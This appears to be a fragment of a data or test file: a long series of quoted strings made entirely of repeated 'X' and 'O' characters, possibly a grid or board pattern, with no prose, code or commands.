XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOO
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","O
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
